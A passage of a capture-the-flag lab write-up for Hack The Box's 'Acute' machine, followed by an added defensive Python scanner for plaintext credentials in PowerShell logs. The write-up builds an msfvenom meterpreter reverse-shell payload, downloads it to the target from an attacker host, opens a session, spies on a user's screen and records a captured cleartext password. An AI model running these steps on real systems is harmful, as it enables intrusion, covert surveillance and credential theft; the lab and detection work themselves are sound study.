Interactive Session


As discovered by PEAS earlier, there appears to be an active session on the Acute-PC01 host:

PS C:\Utils> query user
 USERNAME              SESSIONNAME        ID  STATE   IDLE TIME  LOGON TIME
 edavies               console             1  Active      none   07/11/2023 04:33

While it doesn't appear to be an RDP session as PEAS claimed, the session listed isn't mine either: its logon time is completely different, much earlier than mine.

This likely means that someone else is using the Acute-PC01 host.

While there are many ways to go about this, I will use Metasploit's screenshare module to take a look at what the user is doing. To do that, I first need to establish a meterpreter session.

Meterpreter


┌──(kali㉿kali)-[~/archive/htb/labs/acute]
└─$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.16.8 LPORT=9998 -f exe -o msf.exe 
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 510 bytes
Final size of exe file: 7168 bytes
Saved as: msf.exe

msfvenom generated a staged meterpreter payload. Executing this binary on the host connects back to the listener, and the listener then sends the remaining stage.

PS C:\Utils> iwr -Uri 'http://10.10.16.8/msf.exe' -OutFile C:\Utils\msf.exe

Transferring the staged payload to the host over HTTP.

┌──(kali㉿kali)-[~/archive/htb/labs/acute]
└─$ msfconsole                                                     
 
msf6 > use multi/handler
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 10.10.6.8
LHOST => 10.10.6.8
msf6 exploit(multi/handler) > set LPORT 9998
LPORT => 9998
msf6 exploit(multi/handler) > run
 
[-] Handler failed to bind to 10.10.6.8:9998:-  -
[*] Started reverse TCP handler on 0.0.0.0:9998 

The listener is up and running. Note that LHOST was mistyped as 10.10.6.8 here (the payload was built for 10.10.16.8), so the handler could not bind to that address and fell back to listening on 0.0.0.0, which is why the callback still works.

Executing the staged payload on the Acute-PC01 host:

[*] Sending stage (200774 bytes) to 10.10.11.145
[*] Meterpreter session 2 opened (10.10.16.8:9998 -> 10.10.11.145:49799) at 2023-11-07 17:59:12 +0100
 
meterpreter > 

A meterpreter session has been established.

screenshare


meterpreter > screenshare
[*] Preparing player...
[*] Opening player at: /home/kali/archive/htb/labs/acute/kIouYSmS.html
[*] Streaming...

Executing the screenshare module. This streams the current interactive session to the /home/kali/archive/htb/labs/acute/kIouYSmS.html file, which can be opened in a browser.

It's indeed an interactive session by the edavies user.

CLEARTEXT Credential


A moment later, the user opens a PowerShell window and types in a few commands. Those commands are:

  • Attempting to start another PowerShell session to the ATSSERVER host as the imonks user
    • under the dc_manage configuration
  • Creating a PSCredential object for the imonks user with the CLEARTEXT password: W3_4R3_th3_f0rce
  • Interestingly, the command fails because PowerShell's Measure-Object cmdlet is not recognized

Moving on to the Lateral Movement phase.
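As an added defender-side example (not part of the original writeup): a small Python scanner over constructed PowerShell script-block log entries, shaped like the ScriptBlockText field of Event ID 4104, that flags the pattern observed here, a plaintext secret literal passed to ConvertTo-SecureString -AsPlainText and wrapped in a PSCredential, and notes remote sessions to a constrained (-ConfigurationName) endpoint. The record IDs, host, configuration name, account and password in the samples are constructed placeholders; the finding reports only the length of the literal so the alert itself does not copy the secret.

```python
import re
from dataclasses import dataclass

# Constructed sample entries shaped like Event ID 4104 ScriptBlockText; not real captures.
SAMPLE_SCRIPT_BLOCKS = {
    1001: "$p = ConvertTo-SecureString 'ExamplePassw0rd!' -AsPlainText -Force; "
          "$c = New-Object System.Management.Automation.PSCredential('EXAMPLE\\svc_user', $p)",
    1002: "$c = Get-Credential; "
          "Enter-PSSession -ComputerName EXAMPLE-SRV -ConfigurationName example_jea -Credential $c",
    1003: "$s = Get-Content .\\cred.txt | ConvertTo-SecureString",  # benign: encrypted input
}

QUOTED_LITERAL = re.compile(r"""(['"])(?P<lit>.*?)\1""")
SECURESTRING = re.compile(r"ConvertTo-SecureString", re.I)
ASPLAINTEXT = re.compile(r"-AsPlainText", re.I)
PSCREDENTIAL = re.compile(r"PSCredential", re.I)
REMOTE_SESSION = re.compile(r"(Enter|New)-PSSession\b.*?-ConfigurationName\s+(\S+)", re.I)

@dataclass
class Finding:
    record_id: int
    severity: str
    detail: str

def analyze_script_block(record_id, text):
    """Inspect one script block statement by statement (split on ';')."""
    findings = []
    for stmt in text.split(";"):
        if SECURESTRING.search(stmt) and ASPLAINTEXT.search(stmt):
            lit = QUOTED_LITERAL.search(stmt)
            if lit:  # the secret is sitting in the log in cleartext; report length only
                findings.append(Finding(record_id, "high",
                    f"plaintext secret literal ({len(lit.group('lit'))} chars) "
                    "passed to ConvertTo-SecureString -AsPlainText"))
            else:    # plaintext conversion of a variable or other non-literal value
                findings.append(Finding(record_id, "medium",
                    "ConvertTo-SecureString -AsPlainText on a non-literal value"))
        if PSCREDENTIAL.search(stmt):
            findings.append(Finding(record_id, "info", "PSCredential object constructed"))
        m = REMOTE_SESSION.search(stmt)
        if m:
            findings.append(Finding(record_id, "info",
                f"remote session to constrained endpoint -ConfigurationName {m.group(2)}"))
    return findings

def scan(blocks):
    """Run the analysis over all records, in record-id order."""
    return [f for rid, text in sorted(blocks.items()) for f in analyze_script_block(rid, text)]

if __name__ == "__main__":
    for f in scan(SAMPLE_SCRIPT_BLOCKS):
        print(f"[{f.severity}] record {f.record_id}: {f.detail}")
```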